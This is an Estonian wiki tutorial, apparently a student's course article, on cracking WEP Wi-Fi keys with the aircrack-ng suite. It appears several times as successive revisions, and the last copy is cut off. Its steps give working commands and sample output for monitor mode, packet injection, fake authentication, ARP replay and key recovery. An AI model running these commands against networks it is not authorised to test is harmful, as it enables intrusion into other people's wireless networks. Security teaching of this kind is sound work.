<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:24:29Z

Ktragel: /* Näide WEP võtme lahti murdmise protsessist */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:24:04Z

Ktragel: /* Näide WEP võtme lahti murdmise protsessist */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

